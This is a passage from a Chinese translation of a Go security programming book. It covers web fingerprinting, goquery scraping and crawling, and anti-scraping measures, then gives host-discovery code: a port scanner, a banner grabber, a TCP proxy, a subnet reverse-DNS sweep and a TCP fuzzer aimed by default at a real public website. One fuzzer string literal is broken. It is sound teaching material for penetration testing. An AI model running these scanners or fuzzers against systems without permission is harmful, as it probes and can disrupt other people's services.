举个假设的例子,假设版本 1.0 只包含一个文件:main.js。版本 1.1 引入了第二个文件:utility.js。版本 1.3 删除了这两个文件,并用一个文件master.js替换了它们。你可以向 Web 服务器发出 HTTP 请求获取这三个文件:main.jsutility.jsmaster.js。根据哪些文件返回 200 OK 错误,哪些文件返回 404 NOT FOUND 错误,你可以确定正在运行的是哪个版本。

如果相同的文件存在于多个版本中,你可以深入检查文件的内容。可以进行逐字节比较或对文件进行哈希处理并比较校验和。哈希处理和哈希处理的示例在第六章 密码学中有介绍。

有时,识别版本可能比刚才描述的整个过程简单得多。有时会有一个CHANGELOG.txtreadme.html文件,它会告诉您确切地运行的是哪个版本,而无需做任何工作。

如何防止您的应用程序被指纹识别

正如前面所示,有多种方法可以在技术堆栈的许多不同级别上对应用程序进行指纹识别。您真正应该问自己的第一个问题是,“我需要防止指纹识别吗?”一般来说,试图防止指纹识别是一种混淆形式。混淆有点具有争议性,但我认为每个人都同意混淆不是加密的安全性。它可能会暂时减慢、限制信息或使攻击者困惑,但它并不能真正防止利用任何漏洞。现在,我并不是说混淆根本没有好处,但它永远不能单独依赖。混淆只是一层薄薄的掩饰。

显然,您不希望透露太多关于您的应用程序的信息,比如调试输出或配置设置,但无论如何,当服务在网络上可用时,一些信息都将可用。您将不得不在隐藏信息方面做出选择,需要投入多少时间和精力。

有些人甚至会输出错误信息来误导攻击者。就我个人而言,在加固服务器时,输出虚假标头并不在我的清单上。我建议您做的一件事是在部署之前删除任何额外的文件,就像之前提到的那样。在部署之前,应删除诸如更改日志文件、默认设置文件、安装文件和文档文件等文件。不要公开提供不需要应用程序工作的文件。

混淆是一个值得单独章节甚至单独一本书的话题。有一些专门颁发最有创意和奇异的混淆形式的混淆竞赛。有一些工具可以帮助您混淆 JavaScript 代码,但另一方面也有反混淆工具。

使用 goquery 包进行网络抓取

goquery包不是标准库的一部分,但可以在 GitHub 上找到。它旨在与 jQuery 类似——这是一个用于与 HTML DOM 交互的流行 JavaScript 框架。正如前面所示,尝试使用字符串匹配和正则表达式进行搜索既繁琐又复杂。goquery包使得处理 HTML 内容和搜索特定元素变得更加容易。我建议这个包的原因是它是基于非常流行的 jQuery 框架建模的,许多人已经熟悉它。

您可以使用go get命令获取goquery包:

go get https://github.com/PuerkitoBio/goquery  

文档可在godoc.org/github.com/PuerkitoBio/goquery找到。

列出页面中的所有超链接

在介绍goquery包时,我们将看一个常见且简单的任务。我们将找到页面中的所有超链接并将它们打印出来。典型的链接看起来像这样:

<a href="https://www.devdungeon.com">DevDungeon</a>  

在 HTML 中,a标签代表锚点href属性代表超链接引用。可能会有一个没有href属性但只有name属性的锚标签。这些被称为书签,或命名锚点,用于跳转到同一页面上的位置。我们将忽略这些,因为它们只在同一页面内链接。target属性只是一个可选项,用于指定在哪个窗口或选项卡中打开链接。在这个例子中,我们只对href值感兴趣:

// Load a URL and list all links found
package main

import (
   "fmt"
   "github.com/PuerkitoBio/goquery"
   "log"
   "net/http"
   "os"
)

func main() {
   // Load command line arguments
   if len(os.Args) != 2 {
      fmt.Println("Find all links in a web page")
      fmt.Println("Usage: " + os.Args[0] + " <url>")
      fmt.Println("Example: " + os.Args[0] + 
         " https://www.devdungeon.com")
      os.Exit(1)
   }
   url := os.Args[1]

   // Fetch the URL
   response, err := http.Get(url)
   if err != nil {
      log.Fatal("Error fetching URL. ", err)
   }

   // Extract all links
   doc, err := goquery.NewDocumentFromReader(response.Body)
   if err != nil {
      log.Fatal("Error loading HTTP response body. ", err)
   }

   // Find and print all links
   doc.Find("a").Each(func(i int, s *goquery.Selection) {
      href, exists := s.Attr("href")
      if exists {
         fmt.Println(href)
      }
   })
} 

在网页中查找文档

文档也是感兴趣的点。您可能希望抓取一个网页并查找文档。文字处理器文档、电子表格、幻灯片演示文稿、CSV、文本和其他文件可能包含各种目的的有用信息。

以下示例将通过 URL 搜索并根据链接中的文件扩展名搜索文档。在顶部定义了一个全局变量,方便列出应搜索的所有扩展名。自定义要搜索的扩展名列表以搜索目标文件类型。考虑扩展应用程序以从文件中获取文件扩展名列表,而不是硬编码。在尝试查找敏感信息时,您会寻找哪些其他文件扩展名?

以下是此示例的代码实现:

// Load a URL and list all documents 
package main

import (
   "fmt"
   "github.com/PuerkitoBio/goquery"
   "log"
   "net/http"
   "os"
   "strings"
)

var documentExtensions = []string{"doc", "docx", "pdf", "csv", 
   "xls", "xlsx", "zip", "gz", "tar"}

func main() {
   // Load command line arguments
   if len(os.Args) != 2 {
      fmt.Println("Find all links in a web page")
      fmt.Println("Usage: " + os.Args[0] + " <url>")
      fmt.Println("Example: " + os.Args[0] + 
         " https://www.devdungeon.com")
      os.Exit(1)
   }
   url := os.Args[1]

   // Fetch the URL
   response, err := http.Get(url)
   if err != nil {
      log.Fatal("Error fetching URL. ", err)
   }

   // Extract all links
   doc, err := goquery.NewDocumentFromReader(response.Body)
   if err != nil {
      log.Fatal("Error loading HTTP response body. ", err)
   }

   // Find and print all links that contain a document
   doc.Find("a").Each(func(i int, s *goquery.Selection) {
      href, exists := s.Attr("href")
      if exists && linkContainsDocument(href) {
         fmt.Println(href)
      }
   })
} 

func linkContainsDocument(url string) bool {
   // Split URL into pieces
   urlPieces := strings.Split(url, ".")
   if len(urlPieces) < 2 {
      return false
   }

   // Check last item in the split string slice (the extension)
   for _, extension := range documentExtensions {
      if urlPieces[len(urlPieces)-1] == extension {
         return true
      }
   }
   return false
} 

列出页面标题和标题

标题是定义网页层次结构的主要结构元素,<h1>是最高级别,<h6>是最低级别。在 HTML 页面的<title>标签中定义的标题是显示在浏览器标题栏中的内容,它不是渲染页面的一部分。

通过列出标题和标题,您可以快速了解页面的主题是什么,假设它们正确格式化了他们的 HTML。应该只有一个<title>和一个<h1>标签,但并非每个人都符合标准。

此程序加载网页,然后将标题和所有标题打印到标准输出。尝试运行此程序针对几个 URL,并查看是否能够通过查看标题快速了解内容:

package main

import (
   "fmt"
   "github.com/PuerkitoBio/goquery"
   "log"
   "net/http"
   "os"
)

func main() {
   // Load command line arguments
   if len(os.Args) != 2 {
      fmt.Println("List all headings (h1-h6) in a web page")
      fmt.Println("Usage: " + os.Args[0] + " <url>")
      fmt.Println("Example: " + os.Args[0] + 
         " https://www.devdungeon.com")
      os.Exit(1)
   }
   url := os.Args[1]

   // Fetch the URL
   response, err := http.Get(url)
   if err != nil {
      log.Fatal("Error fetching URL. ", err)
   }

   doc, err := goquery.NewDocumentFromReader(response.Body)
   if err != nil {
      log.Fatal("Error loading HTTP response body. ", err)
   }

   // Print title before headings
   title := doc.Find("title").Text()
   fmt.Printf("== Title ==\n%s\n", title)

   // Find and list all headings h1-h6
   headingTags := [6]string{"h1", "h2", "h3", "h4", "h5", "h6"}
   for _, headingTag := range headingTags {
      fmt.Printf("== %s ==\n", headingTag)
      doc.Find(headingTag).Each(func(i int, heading *goquery.Selection) {
         fmt.Println(" * " + heading.Text())
      })
   }

} 

爬取存储最常见单词的站点上的页面

此程序打印出网页上使用的所有单词列表,以及每个单词在页面上出现的次数。这将搜索所有段落标签。如果搜索整个正文,它将将所有 HTML 代码视为单词,这会使数据混乱,并且实际上并不帮助您了解站点的内容。它会修剪字符串中的空格、逗号、句号、制表符和换行符。它还会尝试将所有单词转换为小写以规范化数据。

对于它找到的每个段落,它将拆分文本内容。每个单词存储在将字符串映射到整数计数的映射中。最后,映射被打印出来,列出了每个单词以及在页面上看到了多少次:

package main

import (
   "fmt"
   "github.com/PuerkitoBio/goquery"
   "log"
   "net/http"
   "os"
   "strings"
)

func main() {
   // Load command line arguments
   if len(os.Args) != 2 {
      fmt.Println("List all words by frequency from a web page")
      fmt.Println("Usage: " + os.Args[0] + " <url>")
      fmt.Println("Example: " + os.Args[0] + 
         " https://www.devdungeon.com")
      os.Exit(1)
   }
   url := os.Args[1]

   // Fetch the URL
   response, err := http.Get(url)
   if err != nil {
      log.Fatal("Error fetching URL. ", err)
   }

   doc, err := goquery.NewDocumentFromReader(response.Body)
   if err != nil {
      log.Fatal("Error loading HTTP response body. ", err)
   }

   // Find and list all headings h1-h6
   wordCountMap := make(map[string]int)
   doc.Find("p").Each(func(i int, body *goquery.Selection) {
      fmt.Println(body.Text())
      words := strings.Split(body.Text(), " ")
      for _, word := range words {
         trimmedWord := strings.Trim(word, " \t\n\r,.?!")
         if trimmedWord == "" {
            continue
         }
         wordCountMap[strings.ToLower(trimmedWord)]++

      }
   })

   // Print all words along with the number of times the word was seen
   for word, count := range wordCountMap {
      fmt.Printf("%d | %s\n", count, word)
   }

} 

在页面中打印外部 JavaScript 文件列表

检查包含在页面上的 JavaScript 文件的 URL 可以帮助您确定应用程序的指纹或确定加载了哪些第三方库。此程序将列出网页中引用的外部 JavaScript 文件。外部 JavaScript 文件可能托管在同一域上,也可能从远程站点加载。它检查所有script标签的src属性。

例如,如果 HTML 页面具有以下标签:

<script src="img/jquery.min.js"></script>  

src属性的 URL 将被打印:

/ajax/libs/jquery/3.2.1/jquery.min.js

请注意,src属性中的 URL 可能是完全限定的或相对 URL。

以下程序加载 URL,然后查找所有script标签。它将打印它找到的每个脚本的src属性。这将仅查找外部链接的脚本。要打印内联脚本,请参考文件底部关于script.Text()的注释。尝试运行此程序针对您经常访问的一些网站,并查看它们嵌入了多少外部和第三方脚本:

package main

import (
   "fmt"
   "github.com/PuerkitoBio/goquery"
   "log"
   "net/http"
   "os"
)

func main() {
   // Load command line arguments
   if len(os.Args) != 2 {
      fmt.Println("List all JavaScript files in a webpage")
      fmt.Println("Usage: " + os.Args[0] + " <url>")
      fmt.Println("Example: " + os.Args[0] + 
         " https://www.devdungeon.com")
      os.Exit(1)
   }
   url := os.Args[1]

   // Fetch the URL
   response, err := http.Get(url)
   if err != nil {
      log.Fatal("Error fetching URL. ", err)
   }

   doc, err := goquery.NewDocumentFromReader(response.Body)
   if err != nil {
      log.Fatal("Error loading HTTP response body. ", err)
   }

   // Find and list all external scripts in page
   fmt.Println("Scripts found in", url)
   fmt.Println("==========================")
   doc.Find("script").Each(func(i int, script *goquery.Selection) {

      // By looking only at the script src we are limiting
      // the search to only externally loaded JavaScript files.
      // External files might be hosted on the same domain
      // or hosted remotely
      src, exists := script.Attr("src")
      if exists {
         fmt.Println(src)
      }

      // script.Text() will contain the raw script text
      // if the JavaScript code is written directly in the
      // HTML source instead of loaded from a separate file
   })
} 

此示例查找由src属性引用的外部脚本,但有些脚本直接在 HTML 中的开放和关闭script标签之间编写。这些类型的内联脚本不会有引用src属性。使用goquery对象上的.Text()函数获取内联脚本文本。请参考此示例底部,其中提到了script.Text()

这个程序不打印内联脚本,而是只关注外部加载的脚本,因为那是引入许多漏洞的地方。加载远程 JavaScript 是有风险的,应该只能使用受信任的来源。即使如此,我们也不能百分之百保证远程内容提供者永远不会被入侵并提供恶意代码。考虑雅虎这样的大公司,他们公开承认他们的系统过去曾受到入侵。雅虎还有一个托管内容传送网络CDN)的广告网络,为大量网站提供 JavaScript 文件。这将是攻击者的主要目标。在包含远程 JavaScript 文件时,请考虑这些风险。

深度优先爬行

深度优先爬行是指优先考虑相同域上的链接,而不是指向其他域的链接。在这个程序中,外部链接完全被忽略,只有相同域上的路径或相对链接被跟踪。

在这个例子中,唯一的路径被存储在一个切片中,并在最后一起打印出来。在爬行过程中遇到的任何错误都会被忽略。由于链接格式不正确,经常会遇到错误,我们不希望整个程序在这样的错误上退出。

不要试图使用字符串函数手动解析 URL,而是利用url.Parse()函数。它会将主机与路径分开。

在爬行时,忽略任何查询字符串和片段以减少重复。查询字符串在 URL 中用问号标记,片段,也称为书签,用井号标记。这个程序是单线程的,不使用 goroutines:

// Crawl a website, depth-first, listing all unique paths found
package main

import (
   "fmt"
   "github.com/PuerkitoBio/goquery"
   "log"
   "net/http"
   "net/url"
   "os"
   "time"
)

var (
   foundPaths  []string
   startingUrl *url.URL
   timeout     = time.Duration(8 * time.Second)
)

func crawlUrl(path string) {
   // Create a temporary URL object for this request
   var targetUrl url.URL
   targetUrl.Scheme = startingUrl.Scheme
   targetUrl.Host = startingUrl.Host
   targetUrl.Path = path

   // Fetch the URL with a timeout and parse to goquery doc
   httpClient := http.Client{Timeout: timeout}
   response, err := httpClient.Get(targetUrl.String())
   if err != nil {
      return
   }
   doc, err := goquery.NewDocumentFromReader(response.Body)
   if err != nil {
      return
   }

   // Find all links and crawl if new path on same host
   doc.Find("a").Each(func(i int, s *goquery.Selection) {
      href, exists := s.Attr("href")
      if !exists {
         return
      }

      parsedUrl, err := url.Parse(href)
      if err != nil { // Err parsing URL. Ignore
         return
      }

      if urlIsInScope(parsedUrl) {
         foundPaths = append(foundPaths, parsedUrl.Path)
         log.Println("Found new path to crawl: " +
            parsedUrl.String())
         crawlUrl(parsedUrl.Path)
      }
   })
}

// Determine if path has already been found
// and if it points to the same host
func urlIsInScope(tempUrl *url.URL) bool {
   // Relative url, same host
   if tempUrl.Host != "" && tempUrl.Host != startingUrl.Host {
      return false // Link points to different host
   }

   if tempUrl.Path == "" {
      return false
   }

   // Already found?
   for _, existingPath := range foundPaths {
      if existingPath == tempUrl.Path {
         return false // Match
      }
   }
   return true // No match found
}

func main() {
   // Load command line arguments
   if len(os.Args) != 2 {
      fmt.Println("Crawl a website, depth-first")
      fmt.Println("Usage: " + os.Args[0] + " <startingUrl>")
      fmt.Println("Example: " + os.Args[0] + 
         " https://www.devdungeon.com")
      os.Exit(1)
   }
   foundPaths = make([]string, 0)

   // Parse starting URL
   startingUrl, err := url.Parse(os.Args[1])
   if err != nil {
      log.Fatal("Error parsing starting URL. ", err)
   }
   log.Println("Crawling: " + startingUrl.String())

   crawlUrl(startingUrl.Path)

   for _, path := range foundPaths {
      fmt.Println(path)
   }
   log.Printf("Total unique paths crawled: %d\n", len(foundPaths))
} 

广度优先爬行

广度优先爬行是指优先考虑查找新域并尽可能扩展,而不是以深度优先的方式继续通过单个域。

编写一个广度优先爬行器将根据本章提供的信息留给读者作为练习。它与上一节的深度优先爬行器并没有太大的不同,只是应该优先考虑指向以前未见过的域的 URL。

有几点需要记住。如果不小心,不设置最大限制,你可能最终会爬行宠字节的数据!你可能选择忽略子域,或者你可以进入一个具有无限子域的站点,你永远不会离开。

如何防止网页抓取

要完全防止网页抓取是困难的,甚至是不可能的。如果你从 Web 服务器提供信息,总会有一种方式可以以编程方式提取数据。你只能设置障碍。这相当于混淆,你可以说这不值得努力。

JavaScript 使得这更加困难,但并非不可能,因为 Selenium 可以驱动真实的 Web 浏览器,而像 PhantomJS 这样的框架可以用来执行 JavaScript。

需要身份验证可以帮助限制抓取的数量。速率限制也可以提供一些缓解。可以使用诸如 iptables 之类的工具进行速率限制,也可以在应用程序级别进行,基于 IP 地址或用户会话。

检查客户端提供的用户代理是一个浅显的措施,但可以有所帮助。丢弃带有关键字的用户代理的请求,如curlwgetgopythonrubyperl。阻止或忽略这些请求可以防止简单的机器人抓取您的网站,但客户端可以伪造或省略他们的用户代理,以便轻松绕过。

如果你想更进一步,你可以使 HTML 的 ID 和类名动态化,这样它们就不能用来查找特定信息。经常改变你的 HTML 结构和命名,玩起猫鼠游戏,让爬虫的工作变得不值得。这并不是一个真正的解决方案,我不建议这样做,但是值得一提,因为这会让爬虫感到恼火。

你可以使用 JavaScript 来检查关于客户端的信息,比如屏幕尺寸,在呈现数据之前。如果屏幕尺寸是 1 x 1 或 0 × 0,或者是一些奇怪的尺寸,你可以假设这是一个机器人,并拒绝呈现内容。

蜜罐表单是检测机器人行为的另一种方法。使用 CSS 或hidden属性隐藏表单字段,并检查这些字段是否提供了值。如果这些字段中有数据,就假设是机器人在填写所有字段并忽略该请求。

另一个选择是使用图像来存储信息而不是文本。例如,如果你只输出一个饼图的图像,对于某人来说要爬取数据就会更加困难,而当你将数据输出为 JSON 对象并让 JavaScript 渲染饼图时,情况就不同了。爬虫可以直接获取 JSON 数据。文本也可以放在图像中,以防止文本被爬取和防止关键字文本搜索,但是光学字符识别OCR)可以通过一些额外的努力来解决这个问题。

根据应用程序,前面提到的一些技术可能会有用。

总结

阅读完本章后,你现在应该了解了网络爬虫的基础知识,比如执行 HTTP GET请求和使用字符串匹配或正则表达式查找 HTML 注释、电子邮件和其他关键字。你还应该了解如何提取 HTTP 头并设置自定义头以设置 cookie 和自定义用户代理字符串。此外,你应该了解指纹识别的基本概念,并对如何根据提供的源代码收集有关 Web 应用程序的信息有一些想法。

经过这一章的学习,你应该也了解了使用goquery包在 DOM 中以 jQuery 风格查找 HTML 元素的基础知识。你应该能够轻松地在网页中找到链接,找到文档,列出标题和标题,找到 JavaScript 文件,并找到广度优先和深度优先爬取之间的区别。

关于爬取公共网站的一点说明——要尊重。不要通过发送大批量请求或让爬虫不受限制地运行来给网站带来不合理的流量。在你编写的程序中设置合理的速率限制和最大页面计数限制,以免过度拖累远程服务器。如果你是为了获取数据而进行爬取,请始终检查是否有 API 可用。API 更高效,旨在以编程方式使用。

你能想到其他应用本章中所讨论的工具的方式吗?你能想到可以添加到提供的示例中的其他功能吗?

在下一章中,我们将探讨主机发现和枚举的方法。我们将涵盖诸如 TCP 套接字、代理、端口扫描、横幅抓取和模糊测试等内容。

第十一章:主机发现和枚举

主机发现是查找网络上的主机的过程。如果你已经访问了私有网络上的一台机器,并且想要查看网络上的其他机器并开始收集网络的情况,这是很有用的。你也可以将整个互联网视为网络,并寻找特定类型的主机或者只是寻找任何主机。Ping 扫描和端口扫描是识别主机的常用技术。用于此目的的常用工具是 nmap。在本章中,我们将介绍使用 TCP 连接扫描和横幅抓取进行基本端口扫描,这是 nmap 的两种最常见用例。我们还将介绍可以用于手动交互和探索服务器端口的原始套接字连接。

枚举是一个类似的概念,但是指的是主动检查特定机器以获取尽可能多的信息。这包括扫描服务器的端口以查看哪个端口是开放的,获取横幅以检查服务,调用各种服务以获取版本号,并通常搜索攻击向量。

主机发现和枚举是有效渗透测试的关键步骤,因为如果你甚至不知道机器的存在,就无法利用它。例如,如果攻击者只知道如何使用ping命令查找主机,那么你可以通过简单地忽略 ping 请求来轻松地将所有主机隐藏起来,让攻击者无法找到。

主机发现和枚举需要与机器进行主动连接,这样你就会留下日志,可能触发警报,或者被注意到。有一些方法可以偷偷摸摸,比如只执行 TCP SYN 扫描,这样就不会建立完整的 TCP 连接,或者在连接时使用代理,这样不会隐藏你的存在,但会让它看起来好像你是从其他地方连接的。如果 IP 被阻止,使用代理隐藏你的 IP 可能是有用的,因为你可以简单地切换到新的代理。

本章还涵盖了模糊测试,尽管只是简要提及。模糊测试需要有自己的章节,事实上,已经有整本书专门讨论了这个主题。模糊测试在逆向工程或搜索漏洞时更有用,但也可以用于获取有关服务的信息。例如,一个服务可能不返回任何响应,让你对其用途一无所知,但如果你用错误的数据进行模糊测试,它返回一个错误,你可能会了解它期望接收的输入类型。

在本章中,我们将专门涵盖以下主题:

  • TCP 和 UDP 套接字

  • 端口扫描

  • 横幅抓取

  • TCP 代理

  • 在网络上查找命名主机

  • 模糊测试网络服务

TCP 和 UDP 套接字

套接字是网络的构建模块。服务器使用套接字监听,客户端使用套接字拨号来绑定并共享信息。Internet ProtocolIP)层指定了机器的地址,但Transmission Control ProtocolTCP)或User Datagram ProtocolUDP)指定了机器上应该使用的端口。

两者之间的主要区别是连接状态。TCP 保持连接活动并验证消息是否已接收。UDP 只是发送消息而不从远程主机接收确认。

创建服务器

以下是一个示例服务器。如果要更改协议,可以将net.Listen()tcp参数更改为udp

package main

import (
   "net"
   "fmt"
   "log"
)

var protocol = "tcp" // tcp or udp
var listenAddress = "localhost:3000"

func main() {
   listener, err := net.Listen(protocol, listenAddress)
   if err != nil {
      log.Fatal("Error creating listener. ", err)
   }
   log.Printf("Now listening for connections.")

   for {
      conn, err := listener.Accept()
      if err != nil {
         log.Println("Error accepting connection. ", err)
      }
      go handleConnection(conn)
   }
}

func handleConnection(conn net.Conn) {
   incomingMessageBuffer := make([]byte, 4096)

   numBytesRead, err := conn.Read(incomingMessageBuffer)
   if err != nil {
      log.Print("Error reading from client. ", err)
   }

   fmt.Fprintf(conn, "Thank you. I processed %d bytes.\n", 
      numBytesRead)
} 

创建客户端

这个示例创建了一个简单的网络客户端,可以与前面示例中的服务器一起工作。这个示例使用了 TCP,但是像net.Listen()一样,如果要切换协议,可以在net.Dial()中将tcp简单地替换为udp

package main

import (
   "net"
   "log"
)

var protocol = "tcp" // tcp or udp
var remoteHostAddress = "localhost:3000"

func main() {
   conn, err := net.Dial(protocol, remoteHostAddress)
   if err != nil {
      log.Fatal("Error creating listener. ", err)
   }
   conn.Write([]byte("Hello, server. Are you there?"))

   serverResponseBuffer := make([]byte, 4096)
   numBytesRead, err := conn.Read(serverResponseBuffer)
   if err != nil {
      log.Print("Error reading from server. ", err)
   }
   log.Println("Message recieved from server:")
   log.Printf("%s\n", serverResponseBuffer[0:numBytesRead])
} 

端口扫描

在找到网络上的主机之后,也许在进行 ping 扫描或监视网络流量之后,通常希望扫描端口并查看哪些端口是打开的并接受连接。通过查看哪些端口是打开的,您可以了解有关机器的很多信息。您可能能够确定它是 Windows 还是 Linux,或者它是否托管电子邮件服务器、Web 服务器、数据库服务器等。

有许多类型的端口扫描,但这个例子演示了最基本和直接的端口扫描示例,即 TCP 连接扫描。它像任何典型的客户端一样连接,并查看服务器是否接受请求。它不发送或接收任何数据,并立即断开连接,记录是否成功。

以下示例仅扫描本地主机,并将检查的端口限制为保留端口 0-1024。数据库服务器,如 MySQL,通常在较高的端口上侦听,例如3306,因此您将需要调整端口范围或使用常见端口的预定义列表。

每个 TCP 连接请求都在单独的 goroutine 中完成,因此它们都将并发运行,并且完成非常快。使用net.DialTimeout()函数,以便我们可以设置我们愿意等待的最长时间:

package main

import (
   "strconv"
   "log"
   "net"
   "time"
)

var ipToScan = "127.0.0.1"
var minPort = 0
var maxPort = 1024

func main() {
   activeThreads := 0
   doneChannel := make(chan bool)

   for port := minPort; port <= maxPort ; port++ {
      go testTcpConnection(ipToScan, port, doneChannel)
      activeThreads++
   }

   // Wait for all threads to finish
   for activeThreads > 0 {
      <- doneChannel
      activeThreads--
   }
}

func testTcpConnection(ip string, port int, doneChannel chan bool) {
   _, err := net.DialTimeout("tcp", ip + ":" + strconv.Itoa(port), 
      time.Second*10)
   if err == nil {
      log.Printf("Port %d: Open\n", port)
   }
   doneChannel <- true
} 

从服务获取横幅

确定打开的端口后,您可以尝试从连接中读取并查看服务是否提供横幅或初始消息。

以下示例与前一个示例类似,但不仅连接和断开连接,而是连接并尝试从服务器读取初始消息。如果服务器提供任何数据,则打印出来,但如果服务器没有发送任何数据,则不会打印任何内容:

package main

import (
   "strconv"
   "log"
   "net"
   "time"
)

var ipToScan = "127.0.0.1"

func main() {
   activeThreads := 0
   doneChannel := make(chan bool)

   for port := 0; port <= 1024 ; port++ {
      go grabBanner(ipToScan, port, doneChannel)
      activeThreads++
   }

   // Wait for all threads to finish
   for activeThreads > 0 {
      <- doneChannel
      activeThreads--
   }
}

func grabBanner(ip string, port int, doneChannel chan bool) {
   connection, err := net.DialTimeout(
      "tcp", 
      ip + ":"+strconv.Itoa(port),  
      time.Second*10)
   if err != nil {
      doneChannel<-true
      return
   }

   // See if server offers anything to read
   buffer := make([]byte, 4096)
   connection.SetReadDeadline(time.Now().Add(time.Second*5)) 
   // Set timeout
   numBytesRead, err := connection.Read(buffer)
   if err != nil {
      doneChannel<-true
      return
   }
   log.Printf("Banner from port %d\n%s\n", port,
      buffer[0:numBytesRead])

   doneChannel <- true
} 

创建 TCP 代理

与第九章中的 HTTP 代理类似,TCP 级别代理对于调试、记录、分析流量和保护隐私都很有用。在进行端口扫描、主机发现和枚举时,代理可以隐藏您的位置和源 IP 地址。您可能希望隐藏您的来源地,伪装您的身份,或者只是使用一次性 IP,以防因执行请求而被列入黑名单。

以下示例将监听本地端口,将请求转发到远程主机,然后将远程服务器的响应发送回客户端。它还会记录任何请求。

您可以通过在上一节中运行服务器,然后设置代理以转发到该服务器来测试此代理。当回显服务器和代理服务器正在运行时,使用 TCP 客户端连接到代理服务器:

package main

import (
   "net"
   "log"
)

var localListenAddress = "localhost:9999"
var remoteHostAddress = "localhost:3000" // Not required to be remote

func main() {
   listener, err := net.Listen("tcp", localListenAddress)
   if err != nil {
      log.Fatal("Error creating listener. ", err)
   }

   for {
      conn, err := listener.Accept()
      if err != nil {
         log.Println("Error accepting connection. ", err)
      }
      go handleConnection(conn)
   }
}

// Forward the request to the remote host and pass response 
// back to client
func handleConnection(localConn net.Conn) {
   // Create remote connection that will receive forwarded data
   remoteConn, err := net.Dial("tcp", remoteHostAddress)
   if err != nil {
      log.Fatal("Error creating listener. ", err)
   }
   defer remoteConn.Close()

   // Read from the client and forward to remote host
   buf := make([]byte, 4096) // 4k buffer
   numBytesRead, err := localConn.Read(buf)
   if err != nil {
      log.Println("Error reading from client.", err)
   }
   log.Printf(
      "Forwarding from %s to %s:\n%s\n\n",
      localConn.LocalAddr(),
      remoteConn.RemoteAddr(),
      buf[0:numBytesRead],
   )
   _, err = remoteConn.Write(buf[0:numBytesRead])
   if err != nil {
      log.Println("Error writing to remote host. ", err)
   }

   // Read response from remote host and pass it back to our client
   buf = make([]byte, 4096)
   numBytesRead, err = remoteConn.Read(buf)
   if err != nil {
      log.Println("Error reading from remote host. ", err)
   }
   log.Printf(
      "Passing response back from %s to %s:\n%s\n\n",
      remoteConn.RemoteAddr(),
      localConn.LocalAddr(),
      buf[0:numBytesRead],
   )
   _, err = localConn.Write(buf[0:numBytesRead])
   if err != nil {
      log.Println("Error writing back to client.", err)
   }
}

在网络上查找命名主机

如果您刚刚获得对网络的访问权限,您可以做的第一件事之一是了解网络上有哪些主机。您可以扫描子网上的所有 IP 地址,然后进行 DNS 查找,看看是否可以找到任何命名主机。主机名可以具有描述性或信息性的名称,可以提供有关服务器可能正在运行的内容的线索。

纯 Go 解析器是默认的,只能阻塞一个 goroutine 而不是系统线程,这样更有效率一些。您可以使用环境变量显式设置 DNS 解析器:

export GODEBUG=netdns=go    # Use pure Go resolver (default)
export GODEBUG=netdns=cgo   # Use cgo resolver

这个例子寻找子网上的每个可能的主机,并尝试为每个 IP 解析主机名:

package main

import (
   "strconv"
   "log"
   "net"
   "strings"
)

var subnetToScan = "192.168.0" // First three octets

func main() {
   activeThreads := 0
   doneChannel := make(chan bool)

   for ip := 0; ip <= 255; ip++ {
      fullIp := subnetToScan + "." + strconv.Itoa(ip)
      go resolve(fullIp, doneChannel)
      activeThreads++
   }

   // Wait for all threads to finish
   for activeThreads > 0 {
      <- doneChannel
      activeThreads--
   }
}

func resolve(ip string, doneChannel chan bool) {
   addresses, err := net.LookupAddr(ip)
   if err == nil {
      log.Printf("%s - %s\n", ip, strings.Join(addresses, ", "))
   }
   doneChannel <- true
} 

对网络服务进行模糊测试

模糊测试是指向应用程序发送故意格式不正确、过多或随机的数据,以使其行为异常、崩溃或泄露敏感信息。您可以识别缓冲区溢出漏洞,这可能导致远程代码执行。如果在向应用程序发送特定大小的数据后导致其崩溃或停止响应,可能是由于缓冲区溢出引起的。

有时,你可能会因为使服务使用过多内存或占用所有处理能力而导致拒绝服务。正则表达式因其速度慢而臭名昭著,并且可以在 Web 应用程序的 URL 路由机制中被滥用,用少量请求就可以消耗所有 CPU。

非随机但格式错误的数据可能同样危险,甚至更危险。一个正确格式错误的视频文件可能会导致 VLC 崩溃并暴露代码执行。一个正确格式错误的数据包,只需改变 1 个字节,就可能导致敏感数据暴露,就像 Heartbleed OpenSSL 漏洞一样。

以下示例将演示一个非常基本的 TCP 模糊器。它向服务器发送逐渐增加长度的随机字节。它从 1 字节开始,按 2 的幂指数级增长。首先发送 1 字节,然后是 2、4、8、16,一直持续到返回错误或达到最大配置限制。

调整maxFuzzBytes以设置要发送到服务的数据的最大大小。请注意,它会同时启动所有线程,所以要小心服务器的负载。寻找响应中的异常或服务器的崩溃。

package main

import (
   "crypto/rand"
   "log"
   "net"
   "strconv"
   "time"
)

var ipToScan = "www.devdungeon.com"
var port = 80
var maxFuzzBytes = 1024

func main() {
   activeThreads := 0
   doneChannel := make(chan bool)

   for fuzzSize := 1; fuzzSize <= maxFuzzBytes; 
      fuzzSize = fuzzSize * 2 {
      go fuzz(ipToScan, port, fuzzSize, doneChannel)
      activeThreads++
   }

   // Wait for all threads to finish
   for activeThreads > 0 {
      <- doneChannel
      activeThreads--
   }
}

func fuzz(ip string, port int, fuzzSize int, doneChannel chan bool) {
   log.Printf("Fuzzing %d.\n", fuzzSize)

   conn, err := net.DialTimeout("tcp", ip + ":" + strconv.Itoa(port), 
      time.Second*10)
   if err != nil {
      log.Printf(
         "Fuzz of %d attempted. Could not connect to server. %s\n", 
         fuzzSize, 
         err,
      )
      doneChannel <- true
      return
   }

   // Write random bytes to server
   randomBytes := make([]byte, fuzzSize)
   rand.Read(randomBytes)
   conn.SetWriteDeadline(time.Now().Add(time.Second * 5))
   numBytesWritten, err := conn.Write(randomBytes)
   if err != nil { // Error writing
      log.Printf(
         "Fuzz of %d attempted. Could not write to server. %s\n", 
         fuzzSize,
         err,
      )
      doneChannel <- true
      return
   }
   if numBytesWritten != fuzzSize {
      log.Printf("Unable to write the full %d bytes.\n", fuzzSize)
   }
   log.Printf("Sent %d bytes:\n%s\n\n", numBytesWritten, randomBytes)

   // Read up to 4k back
   readBuffer := make([]byte, 4096)
   conn.SetReadDeadline(time.Now().Add(time.Second *5))
   numBytesRead, err := conn.Read(readBuffer)
   if err != nil { // Error reading
      log.Printf(
         "Fuzz of %d attempted. Could not read from server. %s\n", 
         fuzzSize,
         err,
      )
      doneChannel <- true
      return
   }

   log.Printf(
      "Sent %d bytes to server. Read %d bytes back:\n,
      fuzzSize,
      numBytesRead, 
   )
   log.Printf(
      "Data:\n%s\n\n",
      readBuffer[0:numBytesRead],
   )
   doneChannel <- true
} 

总结

